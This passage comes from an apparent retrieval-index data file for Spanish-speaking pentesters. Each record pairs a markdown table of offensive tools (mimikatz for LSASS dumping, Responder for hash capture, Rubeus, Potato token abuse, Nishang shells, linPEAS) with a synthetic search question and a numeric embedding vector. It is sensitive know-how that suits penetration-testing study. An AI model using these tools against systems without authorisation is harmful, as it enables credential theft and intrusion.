-0.00532, -0.05504, 0.01291, 0.01348, -0.0041, 0.07867, 0.04251, 0.04867, 0.01209, 0.04083, 0.02201, 0.066, 0.03796, 0.00862, -0.02554, 0.12908, 0.06315, -0.05323, 0.01886, -0.01669, 0.06997, -0.04482, 0.02178, -0.04684, -0.00645, -0.06052, -0.01629, 0.00559, -0.02062, -0.01601, 0.08273, -0.04405, 0.03184, 0.04203, 0.03936, -0.03624, 0.00263, 0.06279, 0.04889, -0.00219, 0.00554, 0.01055, -0.03849, -0.08064, -0.04914, -0.03128, -0.03286, -0.00739, 0.08209, 0.03693, -0.02429, -0.0723, -0.05944, 0.02197, 0.00162, 0.01685, 0.07322, -0.10844, -0.07709, -0.08734, -0.0206, 0.03663, -0.01404, -0.02929, -0.00563, 0.01418, 0.03873, 0.00411, 0.03837, -0.0069, -0.02271, -0.0569, -0.00417, 0.07498, -0.0044, 0.01574, -0.04073, -0.0334, 0.03451, -0.01228, 0.00873, 0.01582, -0.01177, 0.01828, -0.00656, 0.02088, 0.0567, -0.03144, -0.0193, -0.06706, -0.05319, -0.00591, -0.01882, -0.04393, -0.02769, -0.00556, 0.08418, -0.09406, 0.04553, -0.09659]} -{"tipo": "pregunta", "herramienta": "Herramientas (Γ­ndice)", "perfil": "PENTESTERS", "fichero": "conocimiento/07 - Referencia/Herramientas (Γ­ndice).md", "tema": "referencia", "fuente": null, "licencia": null, "texto": "## En Kali (corren en tu atacante)\n| Tool | Para quΓ© | Nota |\n|---|---|---|\n| Impacket | suite de protocolos Windows | Impacket |\n| NetExec / CrackMapExec | barrido y post-explotaciΓ³n AD | SMB, Pass-the-Hash |\n| BloodHound | grafo de AD | BloodHound |\n| Responder | envenena LLMNR/NBT-NS/MDNS β†’ captura hashes | Client-side attacks |\n| Evil-WinRM | shell WinRM (5985) | Movimiento lateral |\n| ligolo-ng / chisel | pivoting/tΓΊnel | Pivoting ligolo-ng, Tunneling |\n| Kerbrute | enum de usuarios + spraying Kerberos | AS-REP Roasting |\n| Rubeus | operaciones con tickets Kerberos | Kerberoasting, Silver Ticket |\n| hashcat / john | cracking offline | Cracking de contraseΓ±as |", "indexar": "quΓ© herramientas sirven para hacer un barrido y post-explotaciΓ³n en redes Active Directory?", "v": [-0.01958, 0.04156, -0.14502, -0.22359, -0.04884, -0.00372, 0.00315, -0.01507, -0.06037, -0.09478, -0.04256, -0.12531, -0.04717, -0.0615, 0.11669, -0.00447, 0.00234, -0.02163, 0.03745, -0.07033, -0.08935, 0.11312, -0.01069, 0.11997, -0.04284, -0.04024, -0.00411, -0.12134, -0.21485, 0.15382, 0.00135, 0.05882, 0.02959, -0.03674, -0.01534, -0.04581, -0.0634, 0.02768, -7e-05, 0.00603, -0.04465, -0.07962, -0.17769, -0.01896, 0.06407, 0.1129, -0.02682, -0.16781, -0.02947, 0.11204, -0.05231, -0.15468, -0.09858, -0.03374, 0.02231, -0.1339, 0.08101, -0.06441, -0.08273, -0.0582, 0.00751, -0.13594, -0.04504, -0.02292, -0.02622, -0.07362, 0.07148, 0.05426, -0.04293, 0.17935, 0.01588, 0.04098, -0.01971, 0.06837, 0.05242, 0.06403, 0.0265, 0.0561, -0.08211, 0.0278, -0.02208, 0.01232, 0.00298, -0.00111, -0.06612, -0.10382, 0.04005, -0.08687, -0.02948, -0.12619, 0.09321, 0.08318, -0.08973, -0.03746, 0.00807, 0.03485, 0.03755, 0.03007, 0.10465, -0.01187, 0.01649, -0.04769, -0.02452, 0.02807, 0.07709, 0.09968, -0.04839, 0.00294, -0.04816, -0.0404, -0.01585, -0.05204, -0.02952, -0.06395, -0.01128, 0.08988, -0.14711, -0.06328, -0.02354, -0.01159, -0.04501, -0.02791, -0.00465, 0.00522, 0.04054, -0.0744, -0.05891, 0.06848, 0.07041, -0.00141, -0.02211, -0.0129, -0.05361, -0.11737, 0.00031, -0.13645, 0.0215, -0.06182, -0.0938, -0.13648, 8e-05, -0.0287, -0.04951, -0.07513, 0.02712, 0.03489, 0.04506, -0.11944, -0.00462, -0.00268, 0.03409, -0.03219, -0.04222, -0.00045, 0.00154, 0.03418, -0.02746, -0.06832, -0.0341, 0.07212, 0.01815, -0.10208, -0.01508, 0.01315, -0.04883, 0.04148, -0.06314, -0.03104, 0.02792, 0.06057, -0.07678, 0.09057, 0.04115, -0.01768, 0.00511, -0.05454, -0.00175, 0.03347, 0.07056, -0.01238, -0.03989, 0.01706, -0.04949, 0.02198, -0.00728, -0.01264, 0.05181, -0.08271, -0.02253, 0.02836, 0.02037, 0.03629, 0.04772, 0.01615, 0.01281, -0.08177, -0.03, 0.01462, 0.01593, -0.02557, 0.01564, 0.00594, -0.00898, -0.0128, 0.02966, -0.0221, -0.06763, 0.04085, -0.0183, 0.07795, 0.00126, -0.04179, 0.07232, -0.06502, -0.10466, -0.00566, 0.07075, -0.02074, 0.00736, -0.00216, 0.00635, 0.0555, 0.01468, 0.02758, 0.04171, 0.04323, 0.00694, -0.0341, 0.03829, 0.02573, -0.04156, -0.02141, -0.06412, -0.00749, 0.00213, -0.01899, 0.02904, -0.04331, -0.05882, -0.04776, 0.01953, 0.0146, -0.00185, 0.05852, -0.0506, -0.06716, -0.03878, 0.04039, -0.00713, -0.08408, -0.01024, 0.0112, 0.06707, -0.0118, -0.0109, -0.04364]} -{"tipo": "pregunta", "herramienta": "Herramientas (Γ­ndice)", "perfil": "PENTESTERS", "fichero": "conocimiento/07 - Referencia/Herramientas (Γ­ndice).md", "tema": "referencia", "fuente": null, "licencia": null, "texto": "## En Kali (corren en tu atacante)\n| Tool | Para quΓ© | Nota |\n|---|---|---|\n| Impacket | suite de protocolos Windows | Impacket |\n| NetExec / CrackMapExec | barrido y post-explotaciΓ³n AD | SMB, Pass-the-Hash |\n| BloodHound | grafo de AD | BloodHound |\n| Responder | envenena LLMNR/NBT-NS/MDNS β†’ captura hashes | Client-side attacks |\n| Evil-WinRM | shell WinRM (5985) | Movimiento lateral |\n| ligolo-ng / chisel | pivoting/tΓΊnel | Pivoting ligolo-ng, Tunneling |\n| Kerbrute | enum de usuarios + spraying Kerberos | AS-REP Roasting |\n| Rubeus | operaciones con tickets Kerberos | Kerberoasting, Silver Ticket |\n| hashcat / john | cracking offline | Cracking de contraseΓ±as |", "indexar": "con quΓ© programa puedo generar tickets falsos o robar credenciales Kerberos desde el lado del cliente?", "v": [-0.03116, -0.08304, -0.01258, -0.00168, -0.01644, -0.04455, 0.13708, 0.19378, -0.08995, -0.20608, -0.09349, -0.09492, 0.05225, -0.10732, 0.19113, 0.05845, -0.13846, -0.02146, 0.1633, 0.06057, 0.01759, -0.01415, 0.02334, -0.13948, 0.01028, -0.02181, 0.03401, -0.08381, -0.0235, 0.07978, 0.07926, -0.10958, -0.00945, -0.07819, 0.02995, 0.02006, -0.03103, 0.08807, -0.02653, 0.06244, 0.19947, 0.03478, -0.02315, 0.01849, 0.09652, -0.063, -0.07604, -0.01956, -0.0055, 0.02373, 0.02157, -0.11061, -0.10735, -0.03144, 0.00642, -0.11592, 0.02735, -0.08569, 0.03142, -0.02548, -0.02245, 0.03976, -0.0257, 0.03549, 0.06317, -0.05903, 0.09415, -0.04033, 0.04641, -0.05976, -0.15406, 0.05432, 0.02304, 0.0813, 0.0075, 0.00154, 0.01913, -0.0206, 0.02752, -0.00702, -0.01152, 0.00459, 0.02127, 0.11001, 0.03883, -0.03766, 0.10455, -0.00079, -0.09263, -0.00135, 0.07291, 0.12776, 0.06159, 0.00615, -0.03932, -0.0944, 0.05129, -0.07099, -0.12862, 0.04965, -0.07463, -0.10062, -0.0899, 0.09357, -0.08423, 0.10528, 0.02187, 0.01536, -0.03451, 0.00922, -0.08303, -0.0175, -0.09376, 0.01547, -0.00786, 0.04235, 0.03218, -0.01649, 0.06439, 0.00542, -0.01711, -0.01645, 0.01652, -0.05611, 0.02011, 0.01861, -0.00522, 0.15075, -0.01347, -0.04941, -0.00516, 0.0763, -0.00463, -0.01991, 0.01347, -0.09365, -0.04276, -0.11292, -0.06137, 0.02723, -0.00292, 0.07968, -0.00054, -0.00045, 0.01264, -0.04584, -0.0403, -0.07356, -0.01106, -0.05987, -0.02019, 0.05177, -0.01742, 0.05173, -0.03219, 0.05303, 0.01841, -0.13572, -0.04085, 0.05692, -0.04917, 0.04543, 0.01743, 0.0073, 0.06858, -0.07459, -0.03237, 0.01451, 0.06398, 0.08189, -0.01813, 0.05005, 0.08949, -0.07496, 0.04688, 0.04244, 0.02852, -0.0684, -0.00874, -0.08245, -0.03674, 0.01499, 0.1004, 0.04414, -0.03245, -0.00488, -0.00984, 0.0485, 0.04636, -0.00789, 0.02875, -0.03044, -0.03269, 0.02626, -0.03089, -0.02819, 0.03885, -0.00185, 0.01344, 0.001, -0.06499, 0.01316, 0.04084, -0.01978, 0.08431, 0.05889, -0.00286, 0.0048, -0.03471, 0.09017, 0.10732, -0.11339, 0.06576, -0.0966, -0.03146, -0.01297, -0.016, 0.00532, -0.01063, 0.02819, 0.02797, 0.01159, 0.0283, 0.04774, -0.04409, -0.01738, -0.03229, 0.02807, 0.02555, 0.03786, -0.02669, -0.00715, -0.03681, -0.05601, 0.04566, -0.0003, 0.07685, 0.00328, -0.01428, -0.0734, -0.01707, 0.06086, -0.00909, -0.0895, 0.00642, 0.06756, -0.07054, 0.0156, 0.06094, -0.01529, -0.01849, 0.02189, -0.02771, -0.03215, 0.04616, -0.08958]} -{"tipo": "pregunta", "herramienta": "Herramientas (Γ­ndice)", "perfil": "PENTESTERS", "fichero": "conocimiento/07 - Referencia/Herramientas (Γ­ndice).md", "tema": "referencia", "fuente": null, "licencia": null, "texto": "## En Kali (corren en tu atacante)\n| Tool | Para quΓ© | Nota |\n|---|---|---|\n| Impacket | suite de protocolos Windows | Impacket |\n| NetExec / CrackMapExec | barrido y post-explotaciΓ³n AD | SMB, Pass-the-Hash |\n| BloodHound | grafo de AD | BloodHound |\n| Responder | envenena LLMNR/NBT-NS/MDNS β†’ captura hashes | Client-side attacks |\n| Evil-WinRM | shell WinRM (5985) | Movimiento lateral |\n| ligolo-ng / chisel | pivoting/tΓΊnel | Pivoting ligolo-ng, Tunneling |\n| Kerbrute | enum de usuarios + spraying Kerberos | AS-REP Roasting |\n| Rubeus | operaciones con tickets Kerberos | Kerberoasting, Silver Ticket |\n| hashcat / john | cracking offline | Cracking de contraseΓ±as |", "indexar": "cuΓ‘les son las mejores opciones gratuitas para capturar hashes mediante LLMNR/NBT-NS y realizar ataques de envenenamiento a dominios?", "v": [0.09871, -0.0341, -0.04229, 0.02942, 0.06006, 0.02046, 0.01764, -0.0154, -0.23924, 0.08736, -0.04093, -0.10705, 0.06793, -0.12612, -0.01835, 0.10845, 0.00709, -0.06757, -0.02079, 0.08832, -0.16766, -0.05256, -0.05509, 0.04862, -0.03773, -0.09882, 0.0792, 0.00261, -0.15423, 0.10568, -0.03075, -0.06548, -0.01585, 0.01942, 0.02158, -0.10069, -0.037, 0.07589, 0.03015, 0.05307, 0.09673, 0.11839, -0.17221, 0.03294, 0.01383, -0.12512, -0.11269, -0.02807, 0.01791, -0.25713, 0.09175, 0.12918, -0.14934, -0.05371, -0.07197, -0.05926, 0.1049, -0.03119, -0.00404, -0.05098, -0.07528, -0.02981, 0.03682, -0.09786, -0.01316, -0.11869, -0.00163, -0.03414, -0.09615, -0.00679, 0.02492, 0.03517, 0.06664, 0.06419, 0.01599, 0.10793, 0.0273, -0.01601, 0.08361, 0.04359, 0.08443, -0.06283, -0.07993, -0.01541, -0.17579, 0.04924, -0.0247, -0.13993, -0.0629, -0.06204, 0.04481, 0.02935, 0.02016, -0.00384, -0.01457, -0.08237, 0.03111, -0.06369, 0.04184, -0.00106, 0.03581, 0.00566, -0.10433, 0.10664, -0.03725, 0.0541, 0.02445, -0.03638, 0.0012, -0.00151, -0.03167, -0.0599, -0.06451, -0.04897, -0.07523, -0.0059, -0.06108, -0.09399, 0.06152, -0.01061, -0.088, -0.00575, 0.00442, 0.0054, 0.02977, 0.03431, 0.00626, -0.0085, -0.03389, -0.04836, 0.00435, 0.01099, -0.03363, -0.01305, -0.04391, -0.00195, 0.10782, -0.06972, -0.08067, -0.08844, 0.02582, -0.00058, -0.00356, -0.05437, 0.06092, -0.00322, 0.04231, -0.07254, -0.04746, 0.01348, 0.05439, -0.02068, 0.00067, 0.01991, 0.01786, 0.02914, -0.02557, -0.11435, -0.06133, 0.13159, -0.00838, 0.03361, -0.03985, 0.04248, 0.00536, -0.0319, 0.01109, -0.06537, 0.01791, 0.03804, -0.015, 0.05772, -0.01885, -0.06148, 0.03848, -0.06955, -0.00489, -0.03557, 0.03281, -0.1232, -0.05398, -0.00307, -0.00627, -0.03402, -0.03512, -0.01589, 0.03382, -0.00321, 0.03233, 0.00858, -0.02009, 0.00934, -0.08163, 0.0191, 0.01026, -0.12123, 0.00088, -0.05687, -0.04612, 0.02125, -0.07005, -0.0363, -0.04747, -0.0653, 0.03723, 0.03716, -0.01947, 0.02511, -0.04024, -0.00031, -0.01365, -0.01207, 0.08338, -0.12567, -0.03635, -0.01167, 0.01091, -0.05027, -0.00925, 0.02418, -0.01084, 0.02081, 0.03443, 0.02297, 0.01298, -0.00708, 0.01241, 0.0239, 0.05246, 0.01682, -0.00529, 0.02379, -0.01107, -0.05428, 0.06213, 0.03523, 0.02221, 0.00101, -0.06394, -0.00279, 0.01494, 0.05695, -0.02613, -0.03144, -0.0144, -0.09878, -0.08856, 0.01715, 0.03011, -0.05398, 0.00119, 0.06876, 0.01975, -0.00857, -0.02011, -0.05827]} -{"tipo": "pregunta", "herramienta": "Herramientas (Γ­ndice)", "perfil": "PENTESTERS", "fichero": "conocimiento/07 - Referencia/Herramientas (Γ­ndice).md", "tema": "referencia", "fuente": null, "licencia": null, "texto": "## Las que SUBES a la vΓ­ctima Windows\n| Tool | Para quΓ© | Nota |\n|---|---|---|\n| winPEAS | enumeraciΓ³n de privesc | PEASS-ng |\n| PowerUp / PrivescCheck / Sherlock | privesc PowerShell | Privesc Windows |\n| mimikatz | volcar credenciales de LSASS | Mimikatz |\n| SysInternals (accesschk, PsExec) | permisos, ejecuciΓ³n | Privesc Windows |\n| Nishang | PowerShell ofensivo (shells) | Reverse shell |\n| Potato (God/Print/Juicy) | abuso de token β†’ SYSTEM | Potato attacks |", "indexar": "que herramienta sirve para volcar las credenciales del sistema en Windows?", "v": [-0.08247, -0.03265, -0.09421, -0.14171, 0.05332, -0.14473, -0.05763, -0.07748, 0.10437, -0.16239, -0.09245, -0.11827, -0.06389, -0.13361, 0.01245, 0.0866, -0.02021, -0.19614, 0.00865, 0.06034, -0.04378, -0.098, -0.09893, -0.0279, -0.11222, 0.10631, -0.02085, -0.06445, -0.18993, 0.08966, 0.02226, 0.00131, -0.00524, -0.08092, -0.09249, -0.01238, -0.1039, 0.08094, 0.01091, 0.11722, 0.01327, 0.09386, 0.00822, 0.06765, 0.08819, -0.0366, 0.01798, 0.03252, 0.03581, 0.0401, -0.06718, -0.1648, -0.07277, -0.0364, 0.08698, -0.13256, 0.10941, -0.10724, -0.01557, -0.07617, -0.08455, 0.09668, -0.03334, 0.00525, 0.02374, 0.00072, 0.0244, -0.13371, -0.047, 0.13189, -0.05243, -0.01462, 0.15022, -0.01734, -0.02863, -0.02308, -0.02421, 0.06077, 0.09552, -0.06245, 0.10753, 0.03299, -0.0723, -0.01855, 0.05053, -0.0857, 0.03991, -0.01283, 0.01767, -0.07073, 0.01109, 0.02232, -0.02328, 0.11722, 0.05921, -0.01921, -0.0267, -0.05912, -0.00756, 0.00347, 0.08457, -0.13217, -0.07406, 0.08029, -0.08382, 0.01605, 0.00294, -0.05695, -0.04719, -0.03967, 0.08179, 0.08355, -0.01547, 0.01327, -0.03952, 0.02015, -0.00235, -0.03047, -0.0083, 0.00586, 0.01553, -0.00448, -0.05077, -0.07419, 0.0353, -0.00517, -0.07962, 0.11655, -0.02893, -0.04012, 0.03662, -0.02772, -0.0958, 0.04616, -0.02196, -0.05823, -0.00659, -0.05208, -0.00551, -0.03703, 0.06643, 0.10307, 0.02481, -0.12953, 0.00981, 0.00817, 0.07696, -0.02198, 0.05074, -0.09692, 0.02832, 0.02228, -0.03259, -0.02789, -0.05197, -0.01737, 0.03274, 0.0813, -0.02304, -0.02116, -0.02147, -0.06422, 0.06128, 0.0291, -0.01211, -0.05009, 0.00045, -0.02152, 0.09184, 0.04337, 0.03718, 0.03915, 0.04486, -0.03799, 0.02298, -0.01149, 0.00248, -0.04765, -0.03629, -0.05352, -0.06776, 0.01255, 0.00944, -0.03504, 0.008, 0.00342, -0.04404, 0.05897, -0.0611, 0.00075, 0.00056, -0.01055, 0.05869, -0.05233, 0.0142, 0.02412, -0.03835, -0.07998, 0.05761, 0.03377, -0.08952, -0.00608, -0.02311, -0.07167, 0.07654, 0.08701, 0.05724, 0.01938, 0.07529, 0.07938, 0.03608, 0.01533, 0.04522, -0.03543, -0.05831, -0.05836, 0.00756, 0.02353, -0.00629, -0.05145, 0.06164, -0.01419, 0.01902, 0.04148, -0.03243, -0.03208, -0.03727, 0.02106, 0.00976, -0.03896, 0.02428, -0.05393, 0.01394, -0.00246, 0.00431, -0.05742, 0.02958, -0.02923, -0.053, -0.07229, -0.04751, 0.06396, 0.004, -0.07704, -0.07818, -0.04843, -0.00728, -0.02881, 0.01844, -0.0849, -0.02001, 0.00367, 0.04188, -0.03599, -0.00665, 0.0256]} -{"tipo": "pregunta", "herramienta": "Herramientas (Γ­ndice)", "perfil": "PENTESTERS", "fichero": "conocimiento/07 - Referencia/Herramientas (Γ­ndice).md", "tema": "referencia", "fuente": null, "licencia": null, "texto": "## Las que SUBES a la vΓ­ctima Windows\n| Tool | Para quΓ© | Nota |\n|---|---|---|\n| winPEAS | enumeraciΓ³n de privesc | PEASS-ng |\n| PowerUp / PrivescCheck / Sherlock | privesc PowerShell | Privesc Windows |\n| mimikatz | volcar credenciales de LSASS | Mimikatz |\n| SysInternals (accesschk, PsExec) | permisos, ejecuciΓ³n | Privesc Windows |\n| Nishang | PowerShell ofensivo (shells) | Reverse shell |\n| Potato (God/Print/Juicy) | abuso de token β†’ SYSTEM | Potato attacks |", "indexar": "con que puedo hacer el ataque de abuse de tokens para obtener permisos SYSTEM?", "v": [-0.0576, -0.01172, -0.26527, -0.19728, 0.0567, -0.04124, -0.13945, -0.03425, -0.04338, 0.04454, -0.14256, 0.05804, 0.02523, -0.01289, 0.11732, 0.0247, 0.04468, 0.01436, 0.08878, 0.0778, 0.09058, -0.07192, -0.05001, 0.06599, 0.08107, 0.10975, -0.04335, -0.04488, -0.13117, -0.05534, -0.01542, -0.05339, 0.07162, -0.03219, 0.05755, -0.08312, -0.02418, 0.10791, 0.07413, 0.06277, 0.03005, -0.03099, -0.11465, -0.07152, 0.06767, -0.02599, -0.0319, 0.03802, 0.02811, -0.11332, -0.03499, -0.04368, -0.20919, -0.26505, 0.00796, -0.08981, 0.08759, -0.13101, -0.0558, 0.08651, -0.09795, -0.09415, 0.03005, -0.05925, 0.00568, 0.05063, 0.071, 0.03791, -0.06706, 0.17597, -0.01543, -0.01645, 0.07176, 0.04013, 0.11418, -0.01397, -0.10648, 0.0007, 0.05493, 0.00804, -0.03477, -0.02807, -0.12186, -0.01572, 0.00333, -0.03028, 0.01732, -0.07008, 0.01499, -0.09511, 0.03275, 0.01199, 0.02074, -0.0157, -0.01844, -0.03585, -0.08685, -0.02751, -0.07861, 0.00141, -0.0126, -0.0738, -0.04511, 0.08188, 0.01676, 0.01581, 0.03377, -0.05363, 0.04557, -0.06326, -0.14195, -0.00598, -0.03286, -0.03412, 0.01939, 0.03005, -0.07442, -0.00428, 0.00226, 0.0017, -0.02357, -0.00756, -0.04598, 0.08245, 0.05145, -0.02873, -0.00411, 0.02191, -0.06998, 0.01182, 0.04575, 0.0313, 0.03409, 0.02129, 0.0152, 0.05545, 0.00201, -0.00908, -0.11324, 0.02085, 0.04375, 0.15299, 0.08187, 0.00858, 0.03713, 0.02712, -0.0213, -0.02032, -0.06197, -0.05657, 0.0325, -0.0064, -0.02136, 0.02616, -0.03167, -0.00162, -0.03378, -0.07935, -0.08533, 0.07457, -0.00288, 0.04055, -0.05409, 0.0726, -0.00048, 0.00309, 0.00833, -0.05857, 0.03846, 0.06824, -0.04501, 0.04058, 0.03954, -0.03249, 0.07264, -0.04941, -0.04174, -0.0298, -0.00483, -0.06484, -0.05201, -0.05867, -0.02975, -0.0065, 0.06455, 0.01869, 0.0049, 0.04521, 0.08671, 0.08206, 0.01927, 0.10557, 0.0217, 0.02503, 0.03617, -0.03469, 0.01252, 0.00409, -0.03002, -0.03819, 0.03186, 0.03339, -0.01048, -0.0603, 0.00666, 0.06363, 0.01984, -0.0345, 0.01361, -0.02392, 0.07031, -0.02661, 0.07515, -0.11303, -0.11438, -0.01112, -0.01798, 0.01598, 0.02456, -0.06384, 0.03428, 0.04177, 0.04307, 0.08707, 0.02302, -0.039, 0.00943, -0.03152, 0.02347, 0.04671, -0.02173, -0.05557, 0.01265, -0.05048, 0.02218, -0.0195, 0.00412, -0.0103, -0.08126, 0.01449, 0.02227, -0.00096, 0.02815, 0.00912, -0.0209, -0.02998, -0.03702, -0.01758, -0.01619, -0.02813, 0.02213, 0.03467, 0.02866, -0.03283, 0.03708, -0.02124]} -{"tipo": "pregunta", "herramienta": "Herramientas (Γ­ndice)", "perfil": "PENTESTERS", "fichero": "conocimiento/07 - Referencia/Herramientas (Γ­ndice).md", "tema": "referencia", "fuente": null, "licencia": null, "texto": "## Las que SUBES a la vΓ­ctima Windows\n| Tool | Para quΓ© | Nota |\n|---|---|---|\n| winPEAS | enumeraciΓ³n de privesc | PEASS-ng |\n| PowerUp / PrivescCheck / Sherlock | privesc PowerShell | Privesc Windows |\n| mimikatz | volcar credenciales de LSASS | Mimikatz |\n| SysInternals (accesschk, PsExec) | permisos, ejecuciΓ³n | Privesc Windows |\n| Nishang | PowerShell ofensivo (shells) | Reverse shell |\n| Potato (God/Print/Juicy) | abuso de token β†’ SYSTEM | Potato attacks |", "indexar": "cual es una alternativa libre para enumerar privilegios o ejecutar comandos con permisos elevados en Windows?", "v": [0.1919, 0.09624, -0.05981, -0.09275, 0.05153, -0.02652, 0.0511, -0.10358, -0.17039, -0.17931, -0.03079, -0.05783, 0.05334, -0.04098, 0.04174, -0.0152, 0.11113, -0.00596, 0.01197, 0.01993, 0.03355, -0.05372, -0.056, -0.02096, -0.03294, -0.04915, 0.0266, 0.02021, -0.15758, -0.00796, 0.02043, 0.06086, 0.03694, -0.08248, 0.05914, 0.11123, -0.02725, 0.12319, 0.02619, 0.03605, 0.0172, 0.0884, -0.13919, 0.07252, -0.00571, -0.15299, -0.02294, 0.05398, 0.10076, -0.10389, 0.0174, -0.03049, -0.06493, -0.11106, 0.05916, -0.00554, 0.17224, -0.0515, -0.08517, 0.0722, -0.04879, -0.03103, 0.06537, 0.07364, -0.00542, 0.05841, -0.00025, -0.0757, 0.0533, 0.16905, -0.07609, 0.00056, 0.03712, 0.05388, 0.04368, -0.03917, -0.16814, -0.0899, 0.07555, 0.02997, 0.03633, -0.01756, -0.08443, -0.00242, -0.00788, -0.16261, -0.08164, -0.05241, -0.0124, 0.00886, 0.12767, -0.0191, -0.0291, 0.07028, 0.09513, -0.02923, -0.02199, 0.09647, 0.00742, 0.09889, 0.04791, -0.0353, -0.1114, 0.14578, 0.02712, 0.06875, -0.00454, -0.09837, -0.0608, 0.00446, -0.00213, 0.00389, 0.02611, 0.015, -0.05392, -0.03447, -0.07257, -0.09215, -0.01007, -0.02937, -0.08854, -0.03009, -0.04811, 0.0164, 0.0336, -0.05186, -0.03978, 0.12006, -0.05494, 0.00695, 0.03797, -0.01512, 0.06784, -0.07709, -0.13924, 0.09741, 0.06254, -0.0102, -0.0639, -0.12234, 0.07892, 0.0458, 0.05504, 0.03361, 0.05559, 0.0119, 0.00577, 0.02782, -0.05208, -0.09177, 0.02074, -0.00988, -0.08771, 0.10248, -0.05122, -0.00704, -0.07955, 0.04611, -0.00773, 0.11347, 0.03842, -0.02313, -0.07731, 0.00913, 0.05572, 0.0073, -0.00089, -0.03938, -0.06782, -0.02247, -0.01329, 0.0391, 0.01044, -0.06125, 0.03756, -0.04761, 0.02413, -0.01069, 0.00372, 0.0305, -0.05122, 0.04629, -0.04245, -0.02359, -0.03013, -0.04232, -0.02503, 0.03349, 0.00363, 0.03896, -0.08342, 0.08099, 0.01171, -0.1002, 0.00379, -0.00271, 0.02172, -0.04751, -0.07293, -0.01484, -0.03126, -0.01996, -0.00298, -0.05849, 0.04349, -0.02808, -0.00616, 0.1016, 0.03276, 0.04686, -0.00064, 0.00564, 0.0646, -0.00114, -0.05333, -0.0451, 0.03833, -0.01212, -0.02824, -0.07052, 0.05962, -0.00824, 0.08918, 0.01466, 0.04327, -0.01794, -0.02565, 0.01613, -0.00173, 0.02137, 0.01509, 0.01375, 0.00901, -0.01247, 0.02331, 0.01216, -0.00096, 0.00535, 0.02822, -0.00746, 0.00739, 0.06554, 0.00414, -0.07383, -0.03756, -0.02596, -0.07844, -0.05087, -0.04518, -0.05911, 0.03631, 0.02902, -0.01124, -0.03412, 0.00402, 0.00114]} -{"tipo": "pregunta", "herramienta": "Herramientas (Γ­ndice)", "perfil": "PENTESTERS", "fichero": "conocimiento/07 - Referencia/Herramientas (Γ­ndice).md", "tema": "referencia", "fuente": null, "licencia": null, "texto": "## En la vΓ­ctima Linux\n| Tool | Para quΓ© | Nota |\n|---|---|---|\n| linPEAS / LinEnum / LES / lse | enumeraciΓ³n de privesc | Privesc Linux |\n| pspy | espΓ­a procesos/cron sin root | Privesc Linux |\n\nRelacionado: searchsploit Β· Recursos pΓΊblicos Β· OSCP MOC", "indexar": "quΓ© herramientas me sirven para hacer enumeraciΓ³n de privilegios en Linux", "v": [-0.01366, 0.10102, -0.12281, -0.15544, 0.02021, -0.13267, -0.16563, 0.03707, -0.12707, -0.04273, -0.01218, 0.0159, 0.04052, -0.11372, 0.10032, -0.01617, -0.04193, -0.14375, 0.01624, -0.02781, -0.08959, 0.12843, -0.19589, -0.00021, 0.00348, -0.07607, 0.1458, -0.12151, -0.05865, 0.21463, -0.05319, 0.08784, -0.00236, 0.00935, -0.014, 0.07658, 0.02277, 0.09201, 0.09246, 0.13195, 0.12303, -0.0014, -0.03279, 0.03547, -0.06324, -0.1977, -0.00688, 0.00352, 0.03574, -0.07434, 0.07007, -0.08696, -0.03441, -0.10966, 0.06689, -0.01288, 0.08287, -0.11549, 0.05207, 0.00334, -0.19203, -0.04764, -0.02818, -0.00678, 0.01994, 0.05549, -0.0831, -0.09037, -0.07, 0.10202, -0.03059, 0.03378, 0.01642, -0.04412, -0.02437, -0.03681, -0.10216, 0.06697, 0.00757, -0.00563, 0.01973, 0.01297, -0.01695, 0.02722, -0.0315, -0.11633, 0.02959, 0.1084, -0.04204, 0.03237, 0.06471, 0.11698, 0.00203, 0.01914, 0.1412, 0.04912, 0.06394, 0.12398, 0.03727, -0.00479, 0.05833, -0.04684, -0.09481, 0.13697, -0.00856, 0.00921, 0.00168, -0.04874, -0.03522, -0.05887, 0.01569, 0.01689, 0.03504, 0.04248, -0.05853, 0.01145, -0.05851, -0.01637, -0.02439, -0.02495, 0.0404, -0.00319, -0.04958, -0.00372, 0.02347, -0.04911, -0.06733, 0.12138, -0.00693, -0.08966, 0.05667, -0.12775, -0.00442, 0.00771, 0.02054, 0.00983, 0.07049, -0.13199, -0.03963, -0.05976, 0.05519, 0.01632, -0.06273, 0.00108, 0.10882, -0.02281, 0.04213, -0.04097, -0.0168, -0.10782, -0.04123, -0.07263, 0.01458, -0.00584, -0.07092, -0.09043, 0.00811, 0.02968, -0.07825, -0.03344, -0.00085, -0.07794, 0.02118, -0.00537, 0.00863, -0.00872, 0.0582, 0.05537, -0.01733, -0.02355, 0.03537, 0.0617, 0.01679, -0.02439, -0.00905, -0.07639, 0.02841, 0.029, -0.01846, 0.04566, 0.00374, 0.02859, 0.02965, 0.00468, 0.05286, 0.01226, -0.01217, 0.00959, 0.014, 0.0651, -0.01983, 0.03098, 0.02369, -0.06413, 0.00328, 0.05653, -0.00954, 0.01925, -0.03494, -0.01037, -0.04474, 0.00154, -0.00188, -0.02197, 0.00698, -0.01119, -0.0263, -0.04087, -0.02329, 0.02697, 0.01007, 0.06851, 0.06211, -0.01816, 0.03049, 0.00443, 0.01814, 0.05109, 0.00561, -0.03974, 0.02754, -0.05607, 0.04146, 0.01014, 0.01644, -0.01819, -0.01598, -0.02807, 0.00114, -0.01136, 0.0604, -0.07594, 0.01565, 0.00058, -0.04122, -0.06572, -0.00413, -0.00613, 0.02229, 0.02843, -0.01929, 0.05512, 0.03153, -0.04295, -0.0535, -0.04398, -0.02255, -0.05912, -0.07386, -0.0234, -0.00629, -0.06568, 0.01873, 0.01018, -0.04431, 0.02062]} -{"tipo": "pregunta", "herramienta": "Herramientas (Γ­ndice)", "perfil": "PENTESTERS", "fichero": "conocimiento/07 - Referencia/Herramientas (Γ­ndice).md", "tema": "referencia", "fuente": null, "licencia": null, "texto": "## En la vΓ­ctima Linux\n| Tool | Para quΓ© | Nota |\n|---|---|---|\n| linPEAS / LinEnum / LES / lse | enumeraciΓ³n de privesc | Privesc Linux |\n| pspy | espΓ­a procesos/cron sin root | Privesc Linux |\n\nRelacionado: searchsploit Β· Recursos pΓΊblicos Β· OSCP MOC", "indexar": "con quΓ© puedo obtener informaciΓ³n sobre los procesos activos sin tener root", "v": [-0.08053, 0.10205, -0.05679, -0.10068, 0.17381, -0.04936, 0.05137, -0.03304, -0.16134, 0.03659, -0.18603, -0.06311, 0.11823, 0.01508, 0.18048, 0.00711, 0.00011, -0.06108, -0.05025, -0.01927, -0.04694, -0.14501, -0.07476, 